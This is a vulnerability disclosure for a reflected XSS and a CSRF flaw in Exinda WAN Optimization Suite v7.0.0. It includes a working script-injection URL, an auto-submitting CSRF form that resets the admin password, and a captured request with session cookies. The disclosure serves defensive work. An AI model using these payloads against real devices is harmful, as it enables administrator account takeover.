I. VULNERABILITY
-------------------------
XSS Reflected vulnerabilities and CSRF in Exinda WAN Optimization Suite
II. BACKGROUND
-------------------------
WAN Optimization Suite integrates enterprise-caliber bandwidth acceleration
and optimization with best-in-class application network visibility and
control in a single, easy-to-use suite - See more at:
III. DESCRIPTION
-------------------------
Has been detected a XSS Reflected vulnerability in Exinda Wan Optimization
"/admin/launch?script=rh&template=sys-users&tabsel=" parameter “tabsel” in
version v7.0.0 (2160), that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser. This may
allow a remote attacker to be able to forge requests that Exinda takes
action upon.
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “tabsel” in "
https://demo-nam-01.exinda.com:42818/admin/launch?script=rh&template=sys-
users&tabsel=aaa"><script>alert("Exinda XSS")</script>
POC CSRF
<html>
<body onload="CSRF.submit();">
<form id="CSRF" action="https://demo-nam-
02.exinda.com:34896/admin/launch?script=rh&template=sys-
users&tabsel=localusers" method="post" name="CSRF"> <input name="action10"
value="password_exinda"> </input> <input name="d_account=" value="account">
</input> <input name="t_account" value="string"> </input>
<input name="c_account" value="string"> </input> <input name="e_account"
value="true"> </input> <input name="f_account" value="admin"> </input>
<input name="d_password" value="password"> </input> <input
name="c_password" value="-"> </input>
<input name="m_password" value="false"> </input> <input name="e_password"
value="true"> </input> <input name="f_password" value="123456"> </input>
<input name="d_confirm" value="confirm"> </input> <input name="c_confirm"
value="-"> </input>
<input name="m_confirm" value="false"> </input> <input name="e_confirm"
value="true"> </input>
<input name="f_confirm" value="123456"> </input> <input name="apply"
value="Change+Password"> </input> </form>
</body>
</html>
Host=demo-nam-02.exinda.com:34896
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0)
Gecko/20100101 Firefox/32.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding=gzip,
deflate Referer=https://10.0.1.120/exinda/csrf.php
Cookie=resolutionconfig=today; _mkto_trk=id:316-TKO-387&token:_mch-
exinda.com-1411601373982-94280;
__utma=217124611.1138601206.1411601386.1411601386.1411601386.1;
__utmb=217124611.6.9.1411601437592; __utmc=217124611;
__utmz=217124611.1411601386.1.1.utmcsr=demo.exinda.com|utmccn=(referra
l)|utmcmd=referral|utmcct=/launch.php; iframe=yes;
session=IGQYEA1Jo1%2bOiMFK5%2b1joDCh60VoGvzrLqGJ%2bfF1Q1VCAAE%3d;
SDPSession=9b1195d97d796f12d828a2acd5801718fb152e1b0e3f194ace21529571c
41f8f; user_email=admin; first%5flogin=false; st_index=1411531200;
et_index=1411617600; lastConfigurationPage=https%3A%2F%2Fdemo-nam-
02.exinda.com%3A34896%2Fadmin%2Flaunch%3Fscript%3Drh%26template%3Dsys-
users%26tabsel%3Dlocalusers
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=300
POSTDATA=action10=password_exinda&d_account%3D=account&t_account=strin
g&c_account=string&e_account=true&f_account=admin&d_password=password&
c_password=-
&m_password=false&e_password=true&f_password=123456&d_confirm=confirm&c_confirm=-
&m_confirm=false&e_confirm=true&f_confirm=123456&apply=Change%2BPasswo rd
V. BUSINESS IMPACT -------------------------
Vulnerability allows the execution of arbitrary HTML/script code to be
executed in the context of the victim user's browser and change password of
admin user without consentiment.
VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.
VII. SYSTEMS AFFECTED
-------------------------
Try Exinda WAN Optimization Suite v7.0.0 (2160)
VIII. SOLUTION
-------------------------
All parameter must be validated and use of token csrf